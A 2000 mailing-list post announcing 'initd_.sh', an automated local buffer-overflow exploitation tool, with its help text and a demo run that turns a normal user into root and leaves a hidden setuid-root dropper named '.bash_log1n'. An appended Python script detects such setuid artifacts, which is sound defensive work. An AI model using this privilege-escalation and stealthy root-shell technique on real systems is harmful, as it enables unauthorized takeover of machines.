Vulnerability Development mailing list archives
New Tool: initd_.sh;
From: "za () boo ma fu" <initd_ () digital net>
Date: Tue, 5 Sep 2000 01:17:15 -0400
/*** Attachment did not send... resending (sorry for the bulk) ***/

Heyas ;)

I wrote this tool in the last couple of days to see if I could actually implement a program that would automatically attack local binaries and attempt to find exploits in respect to buffer overflows via command line switches. Despite the script's simplicity I do believe it is a powerful tool that will aid in securing any Linux box, although I refuse to blindly advertise this as an end all be all to local security. As I note in the readme there are numerous discrepancies that limit the program's strength; however, _most_ (if not all) of these issues will be resolved in upcoming releases of this program.

Instead of explaining the entire process and capability I'll just paste the --help output at the end of this message. Also I'll paste an example usage for fun ;D

This program is a first of its kind as far as I know ;) I'm pretty excited to see the response I get from the community. Portability to as many operating systems as possible will be integrated asap; however, it will take a week or two as I am generating the configurable shellcode myself (something I have never done before at this level).

Anyway, I hope you enjoy this beta release!

Sincerely,
initd_
initd_ () digital net
0x7F Security Research

Restless eyes and erratic blue flicker
While devilish fingers dance and slither
The sound of electricity, relentless, hums....
....When something wicked this way comes
- initd_'s verse >;)

---- Help Output ----
seychelles.initd_ % ./initd_.sh
Note: For further explanation on switches consult documentation

usage: initd_.sh [options]
options:
  -t filename        Define the target binary as 'filename'
  --min_buffer int   Define minimum buffer size as 'int'
  --max_buffer int   Define maximum buffer size as 'int'
  --jmp_buffer int   Define buffer increment value as 'int'
  --min_offset int   Define minimum offset size as 'int'
  --max_offset int   Define maximum offset size as 'int'
  --jmp_offset int   Define offset increment value as 'int'
  --tmp_dir dir      Force all tmp files to be written to 'dir'
  --rsd_dir dir      Force the RSD directory to be 'dir'
  --rsdct_dir dir    Force the RSDCT directory to be 'dir'
  --et_dir dir       Force the ET directory to be 'dir'
  --uid int          Force user id of target binary to 'int'
  --gid int          Force group id of target binary to 'int'
  -n                 Do not query program for command line switches
  -s switches        Pass a quoted string of switches to test
  -q                 Switch messaging to quiet mode
  -v                 Increase program verbocity (3 levels max)
  --help | -h        Display program usage

Send comments/questions/bugs to: initd_ () digital net
0x7f Security Research Team: Dangerously Deadicated. . .
--- EOHelp ---

phoenix.initd_ % id
uid=1000(initd_) gid=100(users) groups=100(users)
phoenix.initd_ % ./initd_.sh -t ../../../INITD_2000.08.24/ex --min_buffer 1024 -v -v -v
#
# initd_.sh
# Automated Exploitation Tool v0.0.3
#
# 0x7f Security Research: Something Wicked This Way Comes...
#
[+] Target Confirmed
[+] Binary is not stripped
[+] Strip has been located. Exploit stealth has increased
[+] Confirmed temp directory
[+] RSD Directory confirmed
[+] Configuring for a Linux system on a i586 chip
[ ] Owner of target is root
[ ] Group name of target is root
[+] User id # determined to be 0
[+] Group id number determined to be 0
[ ] Creating the Root Shell Dropper
[+] RSD Creation Successful
[ ] Creating Root Shell Dropper Configuration Tool
[+] RSDCT Creation Successful
[ ] Creating Exploitation Tool
[+] ET Creation Succeeded
[ ] Current Switch: -s
[ ] Current Buffer Size: 1024
[ ] Current Offset: -100
[ ] Current Offset: 0
[ ] Current Offset: 100
[ ] Current Offset: 200
[ ] Current Offset: 300
[ ] Current Offset: 400
[+] Executing Cleanup
[+] Cleanup Complete
[ ] Welcome to the Dark Side
sh-2.02# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.02# exit
exit
phoenix.initd_ % ls -la
total 38
drwxr-xr-x   2 initd_   users        1024 Sep  5 01:05 .
drwxr-xr-x   4 initd_   users        1024 Sep  5 00:31 ..
-rwsr-sr-x   1 root     root         3192 Sep  5 01:05 .bash_log1n
-rw-r--r--   1 initd_   users        9863 Sep  5 00:30 Readme
-rwxr-xr-x   1 initd_   users       21313 Sep  5 00:22 initd_.sh
phoenix.initd_ %
---EOF---

Enjoy ;)
Attachment:
initd_.tar.gz
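
Added example (not part of the original post or of initd_.sh): a defender-side sweep for the kind of artifact visible in the listing above, a setuid/setgid, root-owned, dot-named file (`.bash_log1n`) sitting in a user's directory. The function names `classify` and `scan` and the default `/home` root are assumptions made for this illustration.

```python
import os
import stat

def classify(mode, uid, name):
    """Return the reasons a file deserves review, or [] if it is not a
    setuid/setgid regular file."""
    if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
        return []
    reasons = []
    if mode & stat.S_ISUID:
        reasons.append("setuid")
    if mode & stat.S_ISGID:
        reasons.append("setgid")
    if uid == 0:
        reasons.append("root-owned")
    if name.startswith("."):
        reasons.append("hidden-name")
    return reasons

def scan(root):
    """Walk 'root' without following symlinks and return
    (path, permission string, reasons) for every flagged file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            reasons = classify(st.st_mode, st.st_uid, name)
            if reasons:
                hits.append((path, stat.filemode(st.st_mode), reasons))
    return hits

# Constructed sample: metadata equivalent to the '.bash_log1n' line of the
# 'ls -la' output in the post (-rwsr-sr-x, owner root).
SAMPLE = (stat.S_IFREG | 0o6755, 0, ".bash_log1n")

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/home"  # assumed default
    for path, perms, reasons in scan(target):
        print(perms, path, ",".join(reasons))
```

Run it over home and temp directories, where setuid binaries have no legitimate reason to exist; mounting those filesystems `nosuid` removes the effect of such a file altogether.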